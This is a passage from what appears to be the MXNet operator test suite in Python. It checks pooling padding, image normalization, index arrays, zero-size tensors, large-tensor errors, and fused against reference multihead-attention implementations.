mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
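    # Note: for a CHW array, chained indexing such as data[:][:][0] is equivalent to data[0],
    # i.e. it selects channel 0, so the statements below normalize one channel at a time.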
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
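            # np.mgrid yields one index grid per axis; stacking them on the last axis gives,
            # for every element, its N-dimensional coordinates, which is what contrib.index_array returns.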
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
            assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
            high = 1
            assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
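    # Build the self-attention block twice: first with the fused
    # contrib.interleaved_matmul_selfatt_* ops and, further below, with an equivalent
    # graph of plain FullyConnected/batch_dot ops, so the two implementations can be compared.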
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
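        # Pack the separate q/k/v projection weights so that, for every head, its q, k and v
        # rows are contiguous; this is the interleaved layout consumed by the fused
        # contrib.interleaved_matmul_selfatt_* ops.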
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
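# Worked example of the formula above: for spatial=30, kernel=3, stride=2,
# dilate=2, pad=1 the padded size is 32, the dilated kernel is 2*(3-1)+1 = 5,
# and the output size is (32 - 5) // 2 + 1 = 14.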
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
